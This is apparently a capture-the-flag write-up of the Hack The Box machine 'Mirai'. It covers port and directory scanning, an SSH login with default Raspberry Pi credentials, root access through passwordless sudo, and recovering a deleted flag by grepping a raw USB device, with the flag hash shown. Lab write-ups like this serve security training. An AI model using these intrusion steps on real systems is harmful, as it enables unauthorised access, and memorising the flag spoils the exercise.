HTB: Mirai

Details

This machine is Mirai from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.48
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 15:09 EDT
Nmap scan report for 10.10.10.48
Host is up (0.058s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp    open  domain  dnsmasq 2.76
80/tcp    open  http    lighttpd 1.4.35
1831/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.24 seconds

Mirai

I ran dirb against the port 80 server

root@kali:~# dirb http://10.10.10.48
[SNIP]
==> DIRECTORY: http://10.10.10.48/admin/
[SNIP]

I went to it in browser

Screenshot 1

I tried the default rpi creds over ssh

ssh pi@10.10.10.48

with password

raspberry

Which led to

pi@raspberrypi:~ $

And

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

I can already be root

pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# 
root@raspberrypi:/home# cd /root
root@raspberrypi:~# ls -la
drwx------  3 root root 4096 Aug 27  2017 .
drwxr-xr-x 35 root root 4096 Aug 14  2017 ..
-rw-------  1 root root  549 Dec 24  2017 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r--r--  1 root root   76 Aug 14  2017 root.txt
drwx------  2 root root 4096 Aug 27  2017 .ssh
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

Seems like it isn't done yet then, before digging I took a look for the user flag

root@raspberrypi:/media/usbstick# find / -name user.txt 2>/dev/null
/home/pi/Desktop/user.txt
root@raspberrypi:/media/usbstick# cat /home/pi/Desktop/user.txt
[REDACTED]

Now I look for root

root@raspberrypi:~# cd /media/usbstick/

root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Now it is possible to recover some deleted files with grep

root@raspberrypi:/media/usbstick# grep --binary-files=text 'root' --context=100 /dev/sdb > /tmp/root.txt

Check the results

root@raspberrypi:/media/usbstick# cat /tmp/root.txt
[SNIP]
�|}*,.������+-���3d3e483143ff12ec505d026fa13e020b
[SNIP]

There we go

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.